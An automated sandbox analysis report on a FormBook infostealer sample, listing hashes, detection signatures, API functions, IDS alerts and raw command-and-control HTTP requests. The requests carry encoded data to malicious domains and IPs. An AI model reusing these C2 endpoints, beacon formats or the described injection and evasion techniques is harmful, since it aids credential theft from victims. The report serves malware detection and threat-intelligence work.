Windows Analysis Report
bintoday1.exe

Overview

General Information

Sample name: bintoday1.exe
Analysis ID: 1501089
MD5: 99d47f7fc3f035df01dc336375353e29
SHA1: 170df6ec2df3ad5406669aec1a3143ea96e9294d
SHA256: 69bdeb6d07e36540afe4f1084317c2dad449874becb4476c40e385ce06840a8e
Tags: exeFormbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: bintoday1.exe Virustotal: Detection: 63% Perma Link
Source: bintoday1.exe ReversingLabs: Detection: 63%
Source: Yara match File source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2460538181.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4010508609.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4023622986.00000000009D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4022626506.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2460077708.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4026387029.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2461015937.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4023857362.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: bintoday1.exe Joe Sandbox ML: detected
Source: bintoday1.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: compact.pdbGCTL source: svchost.exe, 00000002.00000003.2416928087.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2417029817.0000000002A24000.00000004.00000020.00020000.00000000.sdmp, eypfpUNFpbLX.exe, 00000006.00000002.4020528447.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eypfpUNFpbLX.exe, 00000006.00000000.2369272396.00000000005FE000.00000002.00000001.01000000.00000005.sdmp, eypfpUNFpbLX.exe, 00000009.00000000.2528816800.00000000005FE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: bintoday1.exe, 00000000.00000003.2184813906.0000000003780000.00000004.00001000.00020000.00000000.sdmp, bintoday1.exe, 00000000.00000003.2178684389.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2460602943.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346609007.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2348425557.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2460602943.000000000319E000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2460297074.0000000000986000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4024433236.0000000002EFE000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4024433236.0000000002D60000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2463034402.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bintoday1.exe, 00000000.00000003.2184813906.0000000003780000.00000004.00001000.00020000.00000000.sdmp, bintoday1.exe, 00000000.00000003.2178684389.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2460602943.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346609007.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2348425557.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2460602943.000000000319E000.00000040.00001000.00020000.00000000.sdmp, compact.exe, compact.exe, 00000007.00000003.2460297074.0000000000986000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4024433236.0000000002EFE000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4024433236.0000000002D60000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2463034402.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compact.pdb source: svchost.exe, 00000002.00000003.2416928087.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2417029817.0000000002A24000.00000004.00000020.00020000.00000000.sdmp, eypfpUNFpbLX.exe, 00000006.00000002.4020528447.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: compact.exe, 00000007.00000002.4015509843.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4026214953.000000000338C000.00000004.10000000.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4024011775.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2753680676.0000000019EAC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: compact.exe, 00000007.00000002.4015509843.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4026214953.000000000338C000.00000004.10000000.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4024011775.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2753680676.0000000019EAC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BFDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00BFDBBE
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BCC2A2 FindFirstFileExW, 0_2_00BCC2A2
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C068EE FindFirstFileW,FindClose, 0_2_00C068EE
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C0698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00C0698F
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BFD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00BFD076
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BFD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00BFD3A9
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C09642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C09642
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C0979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C0979D
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C09B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00C09B2B
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C05C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00C05C97
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004EC570 FindFirstFileW,FindNextFileW,FindClose, 7_2_004EC570
Source: C:\Windows\SysWOW64\compact.exe Code function: 4x nop then xor eax, eax 7_2_004D9C10
Source: C:\Windows\SysWOW64\compact.exe Code function: 4x nop then pop edi 7_2_004F2665
Source: C:\Windows\SysWOW64\compact.exe Code function: 4x nop then mov ebx, 00000004h 7_2_00AD04E0

Networking

barindex
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49725 -> 91.184.0.200:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49735 -> 199.59.243.226:80
Source: Network traffic Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.6:49735 -> 199.59.243.226:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49726 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49747 -> 18.162.124.14:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49746 -> 18.162.124.14:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49736 -> 199.59.243.226:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49722 -> 91.184.0.200:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49744 -> 62.149.128.40:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49739 -> 35.244.245.121:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49728 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49727 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49743 -> 62.149.128.40:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49724 -> 91.184.0.200:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49723 -> 91.184.0.200:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49745 -> 62.149.128.40:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49730 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49741 -> 35.244.245.121:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49737 -> 199.59.243.226:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49719 -> 198.57.245.28:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49740 -> 35.244.245.121:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49753 -> 65.21.196.90:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49734 -> 199.59.243.226:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49751 -> 65.21.196.90:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49742 -> 62.149.128.40:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49750 -> 18.162.124.14:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49748 -> 18.162.124.14:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49738 -> 35.244.245.121:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49752 -> 65.21.196.90:80
Source: DNS query: www.030002721.xyz
Source: Joe Sandbox View IP Address: 62.149.128.40 62.149.128.40
Source: Joe Sandbox View IP Address: 91.184.0.200 91.184.0.200
Source: Joe Sandbox View IP Address: 91.184.0.200 91.184.0.200
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: ARUBA-ASNIT ARUBA-ASNIT
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C0CE44 InternetReadFile,SetEvent,GetLastError,SetEvent, 0_2_00C0CE44
Source: global traffic HTTP traffic detected: GET /n2gl/?oLy=-hKdflfxw6&cLStcv3=flitv4ONTDzavgdus+zcTsH6nWgS1QLhloTdmohmQPl3KhGoeMiAoTCl41HMocxZ34RiCsybNbAZ6Ep4mPYRLqm0WDj9ayw3PA1jxKqGfzp18YAn+IY5szwPiI05gk5QbUl5B1g= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.limonchimneysweep.shopUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /mm14/?cLStcv3=CxHrv/DWf/f861hRjo0poFYX/xbpoqE9Pkz05rQHhXI0npb5DSaX7ma8TZVC8w6DWPy//ybPymtpw/3NO+S+AgB4ZcSH0lp13pJAkJlF+hiKkERgruIPxb4FabZ2eu3OSDY3yr0=&oLy=-hKdflfxw6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.jobworklanka.onlineUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /9b27/?oLy=-hKdflfxw6&cLStcv3=7ENy1dnK+hlvjvEO/OaYGC3Wgmb4rYaSD+U+jb6JyxCjiQU3Pm3SylzrvkP1vqSBFdPksRSgAkGS8fPPQLcJJVTWiO9mdIE7BDDVXVUUUxr3BCXvrTsebkLO52NTcukFU1xGaVw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.helloanecdotenow.infoUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /6t1p/?cLStcv3=5u/7pIClCxGMr2JDx2moDp4N5NUQR5UHhhh3f8bPAU6e1g5SUh+0OFL6u88M+0RJj1mDTEfrnKPtCcHZ9I9M5tKPqU536cb7UTbsX5MdChh4yVfj4lbg76/wDExADHyv3XJ8cq4=&oLy=-hKdflfxw6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.dom-2.onlineUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /m39s/?oLy=-hKdflfxw6&cLStcv3=UQp9655FjW3LvDLkuw2PvKQDrSZERfsuMNaS+TvkLzXyh0NXcttmOremH7COUKcvmncAqxPe6ceu/n78V0Nrg4HMIj+GFDcR1qbYt4rdB9Ep+oQFjrOMsJirX3vFU26KFVbUkuI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kiristyle.shopUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /m3ft/?cLStcv3=mm8fgD9+jitkhgs161OZt8fCms83PFFT8XhsXaqjQsukr7/M7pRfQgp4Nt/ggm/XryzwVs+W+lrB4JMnarTnzCQZM7KWEo1HwHoI3FMw782O73yIdszacYliHArJfGfO1B1Ji3g=&oLy=-hKdflfxw6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.fimgroup.netUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /gzjk/?cLStcv3=YDlNDhHByhlf6nQelagaT3FTRjXu5jrNjAd5ZmuDrGe9JGDYJAs2Uym5b/cCl1RiDZ+iQgyIXf65KlrikbfSKljvf01yS/1iDTwvEAEyzsoYMlH0K0Blq6hvBg/o1tysCZp8w58=&oLy=-hKdflfxw6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.6rkdm.topUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Source: global traffic DNS traffic detected: DNS query: www.limonchimneysweep.shop
Source: global traffic DNS traffic detected: DNS query: www.jobworklanka.online
Source: global traffic DNS traffic detected: DNS query: www.helloanecdotenow.info
Source: global traffic DNS traffic detected: DNS query: www.dom-2.online
Source: global traffic DNS traffic detected: DNS query: www.kiristyle.shop
Source: global traffic DNS traffic detected: DNS query: www.fimgroup.net
Source: global traffic DNS traffic detected: DNS query: www.loveinpoeipet07.site
Source: global traffic DNS traffic detected: DNS query: www.6rkdm.top
Source: global traffic DNS traffic detected: DNS query: www.030002721.xyz
Source: unknown HTTP traffic detected: POST /mm14/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Length: 212Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Host: www.jobworklanka.onlineOrigin: http://www.jobworklanka.onlineReferer: http://www.jobworklanka.online/mm14/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)Data Raw: 63 4c 53 74 63 76 33 3d 50 7a 76 4c 73 4a 7a 49 50 6f 4c 36 36 47 56 71 38 34 74 49 69 6d 49 30 38 68 4b 4f 68 4c 31 77 57 6a 2b 58 36 63 67 47 73 56 34 68 6f 37 36 43 43 78 54 4d 32 6d 66 34 47 65 56 37 78 7a 37 4c 42 2f 4f 76 36 68 69 75 71 6e 70 2b 30 4c 2b 72 50 74 50 41 4c 53 68 46 59 4f 32 33 32 33 63 41 31 37 5a 54 38 4c 49 41 32 68 76 4a 31 46 35 72 6e 49 63 58 69 65 38 77 4b 2f 6f 67 4f 63 33 4c 61 69 4d 6e 33 62 44 47 50 59 63 77 48 6f 54 64 46 39 44 2b 72 62 49 42 68 7a 59 50 47 38 58 4e 70 45 35 56 66 54 61 30 43 34 55 70 77 4d 53 50 78 72 44 66 6a 4c 46 44 77 4e 68 7a 46 65 66 79 67 56 51 35 78 47 4b 73 41 6b 44 50 Data Ascii: cLStcv3=PzvLsJzIPoL66GVq84tIimI08hKOhL1wWj+X6cgGsV4ho76CCxTM2mf4GeV7xz7LB/Ov6hiuqnp+0L+rPtPALShFYO2323cA17ZT8LIA2hvJ1F5rnIcXie8wK/ogOc3LaiMn3bDGPYcwHoTdF9D+rbIBhzYPG8XNpE5VfTa0C4UpwMSPxrDfjLFDwNhzFefygVQ5xGKsAkDP
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:23:25 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 24 Oct 2019 09:25:04 GMTAccept-Ranges: bytesContent-Length: 746Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 36 65 6d 3b 20 7d 20 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 47 65 6f 72 67 69 61 2c 20 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 34 61 34 61 34 61 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 0a 20 20 20 20 53 6f 72 72 79 2c 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 65 20 55 52 4c 20 6f 72 20 67 6f 20 62 61 63 6b 20 61 20 70 61 67 65 2e 0a 20 20 3c 2f 68 31 3e 0a 20 20 0a 20 20 3c 68 32 20 73 74 79 6c 65 3d 22 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 37 64 37 64 37 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 22 3e 0a 20 20 20 20 34 30 34 20 45 72 72 6f 72 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 0a 20 20 3c 2f 68 32 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; marg
